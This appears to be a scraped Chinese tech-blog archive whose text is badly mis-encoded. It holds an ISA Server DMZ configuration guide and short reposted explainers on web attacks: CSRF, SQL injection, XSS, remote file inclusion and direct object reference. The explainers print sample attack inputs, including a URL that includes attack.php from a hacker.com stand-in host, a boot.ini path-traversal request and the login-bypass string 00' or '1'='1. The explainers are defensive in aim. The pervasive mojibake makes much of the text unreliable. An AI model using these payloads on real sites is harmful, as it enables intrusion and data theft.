另外Q如果你对\由非怺解,从上边给出的ISA的网l接口配|看Q你马上会发C个问题。ISA外网接口q接172.16.1.0/24|段、而DMZ区域?72.16.1.64/26|段。我们假设这两个|段的物理介质是以太|标准,?72.16.1.64/26|段中的某个L发v?72.16.1.0/24|段中某C机通讯Ӟ不妨假设172.16.1.69/26?72.16.1.254/24通讯Q对?72.16.1.69/26Q它认ؓ172.16.1.254/24和自׃同属一个逻辑|段Q所以它知道要把d172.16.1.254/24的数据包发送给自己的网?72.16.1.65/26Q由?72.16.1.69/26?72.16.1.65/26在一个广播域Q所以ARP解析不会出现问题。但是反q来Q当172.16.1.254/24要\由或者始发一个数据包?72.16.1.69/26Ӟ问题出C。对?72.16.1.254/24来讲Q它认ؓ172.16.1.69和自己在一个逻辑|段Q所以这个数据包应该是直接发送到172.16.1.69/26Q因此它׃ARP解析172.16.1.69/26的MAC地址Q然而它们ƈ不在同一个广播域Q所以这个ARP解析得不到答案,因此q个数据包就无法发送,然而,如果172.16.1.254/24可以成功的把d172.16.1.69/26的数据包发送给172.16.1.33/24Q也是ISA ServerQ则q个数据包就可以被最l送往172.16.1.69/26。要解决q个问题Q我们应该从两个斚w出发。如果ISA Serverq接ISP的链路层协议是通过q播技术寻址的,则解决的Ҏ?U,一是,与你的ISP联系Q得和ISA相连的\由器中有一条明的?72.16.1.64/26|络下一跳ؓ172.16.1.33/24的\由;二是Q在ISA上实施一U对于链路层d的欺骗手D,例如Q以太网的链路层d是通过ARP协议Q所以你的ISA计算Z必须可以实现Proxy ARP功能Q得ISA计算机可以以自己外网接口的MAC地址回应?72.16.1.64/26|络中主机的ARP查询Q三是,?72.16.1.0/24?72.16.1.64/26|络规划C个广播域之中Q如果采用这U方法,h意ISA只能?#8220;半过?#8221;来保护DMZ区域Q但是这U保护也是有效的。换句浅显易懂的话说Q从外网到DMZ区域的数据包是直接发送的Q但是从DMZ区域到外|的数据包是l由ISA Server送出到外|的。如果,ISA Serverq接ISP的链路层协议是点对点的,那么你不用做M事情Q因为只要是d172.16.1.x的数据包Q不论子|掩码是24位还?6位还?7位,数据包都会正无误的发送到你的ISA Server的外|接口。在W者的试环境中,ISA和ISP的\由器之间的链路层协议是以太网Q笔者对q个路由器有理权力Q所以采用了在\由器上添加\qҎ解决上述问题?/p>

 请在你安装ISA Server之前Q将q些配置讄好。一旦安装好ISA ServerQ在ISA计算Zd或者删除网卡可能会引v意想不到的错误。此外,最好在安装好ISA Server后,不要修改IP的配|,如果你不得不q样做,请遵循以下步骤:
 1Q?在命令行中输入net stop mspfltex
 2Q?在命令行中输入net stop gksvc
 3Q?在命令行中输入net stop IPNAT
 4Q?修改相应|卡的IP讄
 5Q?在命令行中输入net start mspfltex
 6Q?在命令行中输入net start IPNAT
 7Q?在命令行中输入net start isactrl
 8Q?在命令行中输入net start “Microsoft Web Proxy”
 9Q?在命令行中输入net start “Microsoft Firewall”
 10Q在命o行中输入net start “Microsoft Scheduled Cache Content Download”

 Z验证|络层的q通性,我们通常会用Ping工具。Ping工具实际上是ICMP协议的一U应用实例。ؓ了实现目的,你需要对ICMP协议有一些了解。当一C机Ping一个远端计机Ӟ会以ICMP协议 cd8 代码0Q也是通常所说的ICMP Ping Query或者是ICMP Ping RequestQ封装一个数据包发送出去,当远端计机收到q个数据包后Q会以ICMP 协议cd0代码0装QICMP Ping ReplyQ回应的数据包发送给源端。ؓ了DMZ上的L可以Ping通Internet上的LQ你需要允许DMZL发送的ICMP Ping Query能够被ISA Server发送到Internet上,反过来,要允许ICMP Ping Replyq入到DMZ区域。这需要你在IP PACKET FILTER中徏?个封包过滤,具体内容如图2Q图9?br>
 完成之后Q等待一会儿以便新徏的封包过滤生效,也可以重新启动一下Firewall Service服务。之后验证DMZ的主机是否可以Ping通Internet上的LQ也是我们模拟?0.10.10.10那台计算机)。没有问题,DMZ和Internet的网l层实hq通性,但是反过?0.10.10.10却无法Ping通DMZ上的LQ也许这恰y是你的愿望。如果你希望Internet的主机可以Ping通DMZ的主机,也很单,只要把刚才徏立的2个封包过滤的Direction 讄为Both卛_Q原理不再冗q。讲到这里,如果你希望Internet上的计算机可以Ping通你的ISA Server的外部接口,׃变得极其单,W者也׃必浪费笔墨。值得注意的是你不需要添?个封包过滤,而是1个,如果你注意到IP PACKET FILTER中,已经有默认的名ؓICMP outbound的封包过滤就不难理解Q这个封包过滤允许ICMP 所有类型和代码的数据包从ISA的外部接口送出Q也是说你只需入的ICMP Ping Query讄一个允许的包qo卛_。如果你想了解ICMP协议的更多细节,可以参考TechNet CD或者微软帮助站点中的Q170292文档?/p>

 在验证了DMZ区域和Internet的网l层q通性后Q我们要立刻切入正题Q实现对DMZ区域的应用。我们的目的是要使得DMZ区域的各U服务能够被Internet上的用户讉K。你可以Web服务、FTP服务、邮件服务等{部|在DMZ区域Q从而提供Internet用户的访问。笔者D3个典型的例子来说明ISA如何发布DMZ区域的服务器?/p>

发布DMZ区域的Web服务
     1. 首先Q设|好DMZ区域的Web 服务器,默认情况下它应该?0端口监听Webh,如图10。设|完成后Q请利用netstat 工具查看Web服务器是否在0.0.0.0上监?0端口Q笔者假设你没有用SocketPoolingQ?br>   2. 在ISA Server上利用IP PACKET FILTERWeb服务发布。其实说发布有些q于牵强QISA实际上是一个具有过滤功能的路由器,所以我们只是允许来自Internet用户的Webh可以q入到DMZ上的Web服务器。设|的内容如图11Q图14所C?br>   3. 在Internet上的计算机验证是否可以正访问位于DMZ区域的Web服务器。可以看到我们可以正的讉KWeb面Q正如图15昄的那栗在验证之前Q你应该{待一会儿以刚刚建立的封包过滤生效,或者重新启动Firewall Service服务?br>
 完成了,上边的设|后Q不仅Internet上的用户可以讉Kq台Web服务器,ISA Serverq接的内部网l中的用户也可以讉KQ因为我们在?4中的Remote Computer中选择的是All Remote Computers?br>
发布DMZ区域的FTP服务

 ׃FTP有两U工作模式,PORT和PASV模式Q具体区别详见本刊杂?002q第九期《浅析FTP工作原理》?/strong>

 发布PORT模式的FTP的步骤如?br>  1Q设|好DMZ区域的FTP服务器,使其?1端口上监听。如?6。当然你也可以用其他端口,只不q要在配|IP PACKET FILTER时要做相应的调整?br>  2Q不论哪U模式的FTPQ都需要允许远端用戯接FTP服务?1端口的进入请求,所以需要ؓ此徏立一个封包过滤,具体讄如图17Q图20?br>  3QؓFTP的数据通道的徏立设|一个封包过滤。由于PORT模式的数据通道的徏立请求是由FTP服务器主动发LQ所以封包过滤的direction 应该是Outbound而不是Inbound。具体的讄如图21Q图22?/p>

 发布PASV模式的FTP的步骤如?br>  1Q设|FTP服务器在21端口监听Q如上边所q?br>  2Q由于PASV模式的所有连接都是有FTP客户端发LQƈ且用的端口q不是固定的Q因此只需要一?#8220;非安?#8221;的封包过滤即可完成PASV模式的FTP服务器发布。如?3Q图26?/p>

 完成FTP的发布后Q我们在Internet上的FTP客户端验证是否可以正的以PORT和PASV模式q接C于DMZ的FTP服务器,可以看到Q如?7和图28Q连接成功。在发布PASV模式的FTP服务器时Q我们设|了一个安全性较差的包qoQ但是这也是发布位于DMZ区域的PASV模式FTP的无奈之举。因为我们知道FTP的数据通道使用的端口是动态的Q而且动态的范围我们不易控制Q特别是使用微YIIS中提供的FTP服务Q我们根本无法控制。不q你可以选择另一ƾFTP服务器端软gQServU。这个服务器端Y件可以控制PASV模式建立数据通道时用的端口范围Q通过讄q个端口范围我们可以控制本地FTP数据通道使用的端口,但是相应的,在IP PACKET FILTER中的讄也会ȝ许多Q你要ؓq个端口范围中包含的所有端口都讄一个进入的包qo。如果你对安全性很重视Q这个一x怽是绝寚w烦的工作q是有必要的。笔者认为,FTP服务器部|在DMZ区域也许q不是一个明Z举,除非你可以承受这台FTP服务器可以受到攻ȝ事实Q或者你攑ּ使用PASV模式的FTP。然而,FTP服务器部|在内部|络Q可以在保证安全性的前提下(甚至是加强安全性)减轻许多工作Q因为动态端口的问题你不必劳,FTP Application Filter和MS Proxy Protocol可以很好的ؓ你解冻I有关在内部网l部|FTP服务器的问题请参考《用ISA Server发布非标准端口的FTP服务器》以及《用ISA Server 2000发布内部|络的IIS FTP 服务器》?br>
 此外Q如果你军_为在DMZ区域部v的FTP讄那个“非安?#8221;包qoQ笔者有必要做一些安全警告:你的q台FTP服务器完全暴露给Internet上的所有用PMInternet用户可以q接q台服务器的L端口。ISA Server唯一可以做的是利用IP PACKET FILTER中的全局配置QInstruction Detection Qؓq台FTP服务器做一些保护。在q种情况下,你可以在FTP服务器上Q安装一Ƒ֍机版的防火墙软g来加强对q台服务器的保护Q这U保护是实有效的,但是相应的也会增加成本。笔者推荐以下几Ƒ֍机版防火墙YӞNorton Internet Security、BlackICE、ZoneAlarm、天|防火墙?

 下边Q笔者介l一个很有意思的发布DMZ区域的Mail Relay Server的案例。在很多企业中,邮g服务是非帔R要的Q所以要有一U可行的措施有效的保护企业内部的邮g服务器不被攻凅R如果这个邮件服务器必须被O游的用户使用Q那么这台邮件服务器必d以通过Internet被访问,q样面临两U选择Q一是把邮g服务器部|在内部|络Q然后通过ISA发布出去Q另一U是把邮件服务器部v在DMZ区域利用IP PACKET FILTER发布。我们可以综合一下以上两U方案的安全和性能的^衡点Q把邮g服务器部|在内部|络Q在DMZ区域部v一台邮件{发服务器Q通过ISA只发布位于DMZ区域的邮件{发服务器Q这样不仅可以有效的保护邮gpȝ的真实宿M被攻击,因ؓ你发布的只是一个邮件{发服务器Q同时也能够利用邮g转发服务器和ISA的SMTP Filter实施分的邮件过滤?/p>

 完成q个发布工作我们需要做以下几g事情
 - 在企业内部部|Exchange Server 2000Q本文不讨论Q?br> - 在DMZ区域部v邮g转发服务?br> - 发布内部|络的邮件服务器lDMZ区域的邮件{发服务器
 - 利用IP PACKET Filter发布邮g转发服务?/p>

 

 



2010-04-27 09:23 发表评论
]]>
【{】WEB安全pd之六Q信息泄露和不正的错误处理http://www.shnenglu.com/momoxiao/archive/2010/04/14/112558.htmlWed, 14 Apr 2010 07:04:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112558.htmlhttp://www.shnenglu.com/momoxiao/comments/112558.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112558.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/112558.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/112558.html    * 此漏z利用的重点在于应用E序未能正确处理自n发生的错?
    * 此漏z的技术重点在于某些应用程序出错时Q会把错误信息反馈到用户端,q些错误信息通常可用于调试的目的
    * 此漏z的Ҏ重点在于从错误反馈信息中获取有用的信息,从而加以利用,H破|站安全


        当Web应用E序发生错误Ӟ如果处理不得当,可能会把相关的错误信息反馈至客户览器?br>
        q种情况更多见于PHP+MySQL的Web应用Q一些程序h员没有正的做异常处理,当发生错误里Q系l向览器端q回了本来是用于调试目的的相关信息。这些信息往往可能含有重要的安全信息?br>
        例如Q某个网站的MySQL停止了运行,而这时用戯问此|站Ӟ发现|页提示如下信息Q?br>                MySQL Error:Lost connection to MySQL server during query
        从这个回馈来看,用户h的页所使用的数据库是MySQL ! q无疑暴露是安全人员所不希望看到的?br>
        高明的入侵者,会尽可能的其在面览或提交时Q用不正当的数据或ҎQ以此期望页面生错误回馈,从而利用这些信息完成入c?br>
        从服务器角度Q关闭调试信息回馈功能,q且善用异常处理功能Q可以尽可能避免此类安全漏洞?/font>

2010-04-14 15:04 发表评论
]]>
【{】WEB安全pd之五Q跨站请求伪?/title><link>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112556.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Wed, 14 Apr 2010 06:40:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112556.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/112556.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112556.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/112556.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/112556.html</trackback:ping><description><![CDATA[<font size=2><strong>    * 跨站h伪造漏z利用的重点d者了解受完所在的站点<br>    * 跨站h伪造漏z的技术重点在于攻击者需要精心构造可以完成目标装Ҏ据修改的URL<br>    * 跨站h伪造漏z的Ҏ重点在于d者的目标站点h持久化授权cookie或者受完具有当前会话cookieQƈ且目标站Ҏ有对用户在网站行为的W二授权<br><br><br></strong>        我们假定三个角色Q攻击者、用戗网上银行、一个论坛?br><br>        d的流E主要分以下几个步骤Q?br><br>        1、用戯入网上银行操作,该网上银行用持久化授权cookieQ只要用户不清除cookiesQQ何时候连入网上银行时Q该银行|站都认用户是有效的Q?br><br>        2、攻击者在论坛上发表图片,内嵌有GET或POSTҎ的URLq指向该|上银行Q如果该URL׃个银行的合法用户发出Q则该URL会用户帐户被修改;<br><br>        3、用h览此论坛q点击该囄Q攻击者预讄URL被由用户发往银行站点Q因该用h清除cookieQ该h有效Q用户帐户在用户q不知情的前提下被成功修攏V?br><br>我们注意刎ͼq个q程很象跨站脚本dQ但实际上,是完全不同的。跨站脚本攻击需要在客户端写入恶意代码,以搜集cookie{信息,而跨站请求伪造则Ҏ不需要向用户端写入Q何东西,直接利用银行授权的持久认证和用户未清理的cookie?br><br>        q里的问题在于,论坛用户不能上传js脚本Q于是直接利用URL来诱骗用P以致于完成数据操作?br><br>        由此可见Q该d的重点在于要知道目标站点和目标用Pq且该受害站Ҏ有用更多的授权认证?br><br>        对于web站点Q将持久化的授权ҎQ例如cookie或者HTTP授权Q切换ؓ瞬时的授权方法(在每个form中提供隐藏fieldQ,q将帮助|站防止q些d。一U类似的方式是在form中包含秘密信息、用h定的代号作ؓcookie之外的验证?br><br>        另一个可选的Ҏ?#8220;双提?#8221;cookie。此Ҏ只工作于AjaxhQ但它能够作为无需改变大量form的全局修正Ҏ。如果某个授权的 cookie在form post之前正被java script代码dQ那么限制跨域规则将被应用。如果服务器需要在Posth体或者URL中包含授权cookie的请求,那么q个h必须来自于受信Q的域Q因为其它域是不能从信Q域读取cookie的?/font> <img src ="http://www.shnenglu.com/momoxiao/aggbug/112556.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2010-04-14 14:40 <a href="http://www.shnenglu.com/momoxiao/archive/2010/04/14/112556.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>【{】WEB安全pd之四Q不安全的直接对象引用漏z?/title><link>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112555.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Wed, 14 Apr 2010 06:30:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112555.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/112555.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112555.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/112555.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/112555.html</trackback:ping><description><![CDATA[<p><font size=2><strong>    * 不安全的直接对象引用漏洞利用的重Ҏweb开发中Q应用代码访问文件时没受到权限控?br>    * 不安全的直接对象引用漏洞的技术重点在于利用有漏洞的webE序d文gpȝ资料<br>    * 不安全的直接对象引用漏洞的方法重点在于未控制应用E序的访问权?br><br>   本文主要介绍不安全的直接对象引用漏洞的过E而不是技术细节?以PHPZQ看以下q个场景Q?br><br></strong>$filea=$_GET['filename'];<br>echo “<a href=".$filea."> 下蝲此链?</a>";<br><br>如果恶意用户对之加以利用Q就可能可以使用如下方式下蝲用户L上其他的文g<br>http://www.demo.com/downlist.php?filename=c:/boot.ini<br><br>解决此问题的Ҏ是必L制web应用E序Ҏ件的讉K?/font></p> <img src ="http://www.shnenglu.com/momoxiao/aggbug/112555.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2010-04-14 14:30 <a href="http://www.shnenglu.com/momoxiao/archive/2010/04/14/112555.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>【{】WEB安全pd之三Q执行恶意脚?/title><link>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112554.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Wed, 14 Apr 2010 06:24:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112554.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/112554.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2010/04/14/112554.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/112554.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/112554.html</trackback:ping><description><![CDATA[<div class="hdhtxvd" id=read_tpc class=f14><font size=2><strong>    * 恶意代码执行d利用的重Ҏweb开发中引用变量做ؓE序执行的一部分代码<br>    * 恶意代码执行d的技术重点在于让服务器执行了恶意代码,从而完成入侉|数据盗取{行?br>    * 恶意代码执行d的方法重点在于Web开发中,对变量的引用的几个关键部位没有细化处?/strong><br><br>   本文主要介绍恶意代码执行d的过E而不是技术细节?br>先看一Dphp代码的例子:<br><br>$report = $_POST['file']; //定义report变量某个表单变量<br>include $report;          //在代码中包含此变?br><br>如果d者y妙的利用q个漏洞Q就可以令被d服务器执行自q恶意E序Q类似的语法Q?br>http://www.tester.com/index.php?file=http://www.hacker.com/attack.php<br><br>q时Q程序就会读取恶意的attack.phpq引入到index.php中做为执行的一个部分!<br><br>此类d对于脚本cȝ代码最有效?br><br>在编写代码时Q尤其是利用以下的函数引用代码片D|Q?br>PHPQinclude(), include_once(), require(), require_once(), fopen(), readfile(), ...<br>JSP/ServletQjava.io.File(), java.io.FileReader(), ...<br>ASPQinclude file, include virtual, ...<br>应该Ҏ引用的内容做安全的过滤! </font></div> <img src ="http://www.shnenglu.com/momoxiao/aggbug/112554.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2010-04-14 14:24 <a href="http://www.shnenglu.com/momoxiao/archive/2010/04/14/112554.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>【{】WEB安全pd之二QSQL注入漏洞http://www.shnenglu.com/momoxiao/archive/2010/04/14/112553.htmlWed, 14 Apr 2010 06:18:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112553.htmlhttp://www.shnenglu.com/momoxiao/comments/112553.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112553.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/112553.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/112553.html   * 注入漏洞d利用的重Ҏh交互功能的用数据库的动态站?br>    * 注入漏洞d的技术重Ҏ在服务器端执行攻击者的SQL语句
    * 注入漏洞d的方法重点在于动态网存在不安全的SQL生成语句

        本文内容重点在于介绍注入漏洞的攻击过E?br>
        在很多动态web应用中,会提供给用户输入的接口,q且Ҏ用户的输入来生成数据操作的SQL语句。比如一个简单的用户d对话H?
        所谓注入漏z,是指在上q描q的部位Q利用输入的数据参与执行的原理,输入恶意的内容,q而该恶意内容可被执行。D例如下:

        在一个登录界面中Q用戯输入自己的ID号和密码来完成登录过E,生成的SQL可能是如下这个样子:
        select  *  from  t_users  where  user_name=' + 用户输入的ID + ' and user_pwd=' + 用户输入的密?+'
        一个非法的H探者,在用户ID输入框中输入 00'   or   '1'='1  q在密码框里输入00Q生成的整个SQL变成:
        select  *  from  t_users  where  user_name='00‘  or   '1'='1'  and  user_pwd='00'
        q样Q查询是有结果的Q对于不严密的判断,非法用户得以q入该系l?br>
        上面的例子展CZ非法d的手Dc如果用于品检索,则一个普通用h限的用户可以用非法手D获得全部品列表。更严重的情冉|非法用户利用q种漏洞执行pȝ存储q程Q徏立系l用P打开pȝ限制Q完成系l登录?br>        
        如果我们利用数据库存储过E来完成索,利用参数传递的方式来传送参敎ͼ可以避免这U情c?


2010-04-14 14:18 发表评论
]]>
【{】WEB安全pd之一QXSS跨站脚本dhttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112551.htmlWed, 14 Apr 2010 06:14:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112551.htmlhttp://www.shnenglu.com/momoxiao/comments/112551.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/14/112551.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/112551.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/112551.html    * 跨站脚本d利用的重Ҏweb用户Q浏览者)的安全意?br>    * 跨站脚本d的技术重点在于脚本是在用L的浏览器上而非服务器端的服务上执行
    * 跨站脚本d的方法重点在于让用户执行藏有恶意代码的链?/strong>

   本文主要介绍跨站脚本d的过E而不是技术细节?br>
        
        我们假定三个角色Q攻击者、用戗网上银行?br>
        d的流E主要分以下几个步骤Q?br>
        1、攻击者发送EMAILQ其中带有恶意脚本的链接Q链接地址是网上银行)Q或者攻击者在某网站上挂接带有恶意脚本的链接(链接地址是网上银行)Q?br>  
        2、用L击该链接Q连到网上银行,同时Q嵌入链接的脚本被用L览器执行,开始监视用L|络q接Q?br>
        3、用户在|上银行中操作,刚才被执行的脚本攉用户的session和cookie信息Qƈ且在用户毫不知情的情况下发送给d者;

        4、攻击者用搜集来的session信息Q伪装成合法用户q入该网上银行进行违法活动?br>
        由此可见Q该d的重点在于要有可利用的脚本执行的地方。只要有可利用来执行脚本的空_都是该攻d以实施的目标?br>
        在目前,跨站脚本是最大的安全风险?br>        
        l护览器安全,改变操作习惯Q认真对待看到的信息Q不要随意点L的鼠标?/font>

2010-04-14 14:14 发表评论
]]>
【{】【TODO】浅谈反型跨站脚本d的利?/title><link>http://www.shnenglu.com/momoxiao/archive/2010/04/13/112503.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Tue, 13 Apr 2010 13:04:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2010/04/13/112503.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/112503.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2010/04/13/112503.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/112503.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/112503.html</trackback:ping><description><![CDATA[<p>  在Web 2.0技术的发展下越来越多的计算工作被放到客L处理Q由于程序员的疏忽,D了许多的安全漏洞。如今,随着XSS漏洞的危x益增大,如校内和baiduI间前阵子的XSS WORM{等Q其危害之大也引起了大家的重视?/p> <p>  XSS的类型大体分ZU:反射型XSS和持久型XSSQ相比之下,后者的利用要比前者方便许多。甚臌多h认ؓ反射型的XSS是鸡肋,因ؓ其利用v来很不方便,但在安全技术飞速发展的今天Q鸡肋也有变鸡翅的一天。下面我们来看看什么是反射型XSS.</p> <p>  什么是反射型XSS</p> <p>  XSS又叫CSS (Cross Site Script) Q跨站脚本攻凅R它指的是恶意攻击者往Web面里插入恶意html代码Q当用户览该页之时Q嵌入其中Web里面的html代码会被执行Q从而达到恶意攻ȝLҎ目的?/p> <p>  那么什么是反射型XSS?黑哥Ҏ讲的是Ş?<a q样需要欺骗用戯己去点击链接才能触发XSS的是反射型XSSQ如在论坛发贴处的XSS是持久型的XSS.</p> <p>  非持久性XSS(Reflected cross-site scripting)Q是我们通常所说的反射型XSSQ也是最常用Q用最q的一U方式。它通过l别人发送带有恶意脚本代码参数的URLQ当URL地址被打开ӞҎ的恶意代码参数被HTML解析、执行。它的特Ҏ非持久化Q必ȝLd有特定参数的链接才能引v?/p> <p>  持久性XSS(Persistent cross-site scripting)Q指的是恶意脚本代码被存储进被攻ȝ数据库,当其他用h常浏览网|Q站点从数据库中d了非法用户存入非法数据,恶意脚本代码被执行。这U攻ȝ型通常在留a板等地方出现?/p> <p>  很多人非帔R视非持久性XSS(反射型XSS)Q认UXSS只能依靠ƺ骗的手D去骗h点击Q才能让d正常实施h。其实让反射型XSS变得持久的方法,已经出现q好多次了。比如利用applet、利用flash的AS脚本、利用IE的Ghost 面QCross Iframe Trick{等?/p> <p>  反射型XSS的常见利用方?/p> <p>  既然?#8220;需要欺骗用戯己去点击链接才能触发XSS”Q那利用反射型XSS岂不是只有去忽悠用户q一U方?攑֜几年前也许是q样的,现如今,p上演鸡肋变鸡的好戏?</p> <p>  ·ƺ骗</p> <p>  不得不说q是最单有效的利用Ҏ了,但对忽悠的能力有严格的要求,不然用户不会那么Ҏ上钩的。其ơ,现在的用户都有了一定的安全意识Q也不是那么好骗了。以上面提到的链接ؓ例,׃是NASA|站的跨站,大家完全可以在一些天文爱好者聚集的里发类DL消息Q如Q?#8220;国航空航天局公布最新UFO照片”然后加上我们的链接。由于是NASA的链?现在q小学生都知道NASA是干什么的)Q我惛_该会有一部分人相信而去点击从而达C我们的目的,q个反射型的XSS被触发。但如果不是q么y?请往下看?/p> <p>  ·ClickJacking</p> <p>  在去q的OWASP会议上,ClickJackingq种d方式被提了出来。简单来说ClickJacking大致是这么回事:</p> <p>  1. 表现为点L个链接或buttonӞ实际上是点击到别的地方去?劫持链接)</p> <p>  2. 不一定需要javascriptQ所以noscript也挡不住Q但是如果有javascript会让事情更简?/p> <p>  3. d是基于DHTML?/p> <p>  4. 需要攻击者一定程度上控制面</p> <p>  所以,我们只要用L点击劫持到我们的链接上去p了,而且ClickJacking是可以跨域的哦~</p> <p>  具体应用CZ大家去google下就有了?/p> <p>  ·l合CSRF技?/p> <p>  CSRF是伪造客Lh的一U攻击,CSRF的英文全U是Cross Site Request ForgeryQ字面上的意思是跨站点伪造请求。这U攻L式是国外的安全h员于2000q提出,国内直到06q初才被x?/p> <p>  l合CSRF技术来利用反射型XSS是种不错的方法,利用CSRF可以使得q些不好利用的XSS漏洞变得威力无穷。具体示例请参考余弦的《基于CSRF的XSSd?<a >http://huaidan.org/archives/2561.html</a>)Q这里就不细说了Q有Z专门写篇关于CSRF的paper.</p> <p>  ·Cross Iframe Trick</p> <p>  先讲讲这U攻击能够达成什么效果:</p> <p>  1. 跨域执行脚本(IE、Firefox)</p> <p>  2. 把非持久性XSS变成持久性XSS —?gt;!!!</p> <p>  3. 跨页面执行脚?/p> <p>  q种dҎ比较l,具体请参考《Cross Iframe Trick?<a >http://hi.baidu.com/aullik5/blog/item/07d68eb015d72652092302b1.html</a>)</p> <p>  ·反{雅典娜——配合Anehta的回旋镖模块</p> <p>  什么是Anehta? Anehta是一个跨站脚本攻?XSS)的利用^台。功能模块化Q开发者可以单独ؓanehta开发各U各L模块Q以满独特的需求。Anehta中有许多的具有创意的设计Q回旋镖模块(Boomerang)Q就是其中一个。回旋镖模块的作用,是ؓ了跨域获取本地cookieQ只是在站点上有一个XSSQ种cM限,不管是反型XSSQ还是持久型XSSQ都可以为我们工作?/p> <p>  q时Q反型XSS的余热就被充分的发挥了?/p> <p>  析Anehta回旋镖模块工作原?/p> <p>  既然提到了Anehta的Boomerang模块Q那q单说说吧?/p> <p>  Boomerang的工作原理:我们知道Q浏览器被XSSd后,d者可以用js或其他脚本控制浏览器的行为。这时候如果我们强制浏览器去访问站点B上一个存在XSS漏洞的页面,可以l用B站上的XSS_B控制用户的浏览器行ؓ; 那么把整个过E结合v来,单表C如下:</p> <p>  victim Browser —?gt;site AQXSS_A —?redirect to —?gt;Site BQXSS_B —?redirect somewhere —?gt;……</p> <p>  在IE中,iframe、img{标{N是拦截本地cookie的。需要用不拦截cookie的比?window.open{方法,但是window.open会被IE拦截弹出H口Q所以axis牛在Boomerang中用了表单提交Q构造一个formQ向site B提交Q然后再从Site B导入一个XSS BQ获取了cookie后,再通过表单提交Q蟩转回原来的Site A.如果在Site B上,使用XSS_B再将面重新定向?Site AQ那么对于用h_是单的闪了一下,非常hƺ骗性,整个q程像用回旋镖扔出L了一下B一栗?/p> <p>  但其实这q没有把反射型XSS真正的变成持久型的XSSQ只是反型XSS的一U攻L式而已Q也没有跨域Q而是URL重定向{了一圈,跳了一圈又回来了。但q确实是让反型XSS得到了充分的利用Q达C我们的目的。axis牛的q种思\非常值得我们学习!</p> <p>  结</p> <p>  本文只ȝ了常见的反射型XSS利用的方法,但都是简单的提了下,起到了个抛砖引玉的作用,让大家见到反型XSS时能惛_q些(貌似要都详细写出来就太多? -Q?Q如有不之处还请各位见谅?/p> <img src ="http://www.shnenglu.com/momoxiao/aggbug/112503.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2010-04-13 21:04 <a href="http://www.shnenglu.com/momoxiao/archive/2010/04/13/112503.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>regsvr32.exehttp://www.shnenglu.com/momoxiao/archive/2010/04/12/112278.htmlSun, 11 Apr 2010 16:23:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/12/112278.htmlhttp://www.shnenglu.com/momoxiao/comments/112278.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/12/112278.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/112278.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/112278.html
regsvr32.exe /u DLL名称
反注册DLLQ系l将q个DLLUd开机所必须执行的列表)Q此时这个DLLq在q行Q重启后不再被加载,删除卛_

2010-04-12 00:23 发表评论
]]>
